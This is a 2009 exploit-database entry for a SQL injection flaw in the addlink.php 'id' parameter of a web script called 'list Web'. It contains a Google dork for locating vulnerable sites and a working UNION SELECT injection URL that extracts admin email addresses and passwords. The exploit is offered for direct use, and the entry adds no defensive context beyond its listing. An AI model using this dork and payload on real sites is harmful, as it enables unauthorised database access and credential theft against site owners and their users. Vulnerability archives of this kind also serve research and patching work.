list Web (addlink.php id) Remote SQL Injection Vulnerability

2009-12-31T00:00:00
ID SSV:18876
Type seebug
Reporter Root
Modified 2009-12-31T00:00:00

Description

No description provided by source.

                                        
                                            
                                                |
|  list Web  (addlink.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM<http://WwW.IQ-ty.CoM>
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                     |
|
| script : http://maker.ir
|
| DorK   : inurl:"ir/addlink.php?id=" or inurl:"addlink.php?id="
|___________________________________________________|

Exploit:
________


www.[target].com/Script/addlink.php?id=-0+union+select+1,concat(email,0x3e,password),3,4+from+admin--

IQ-SecuritY FoRuM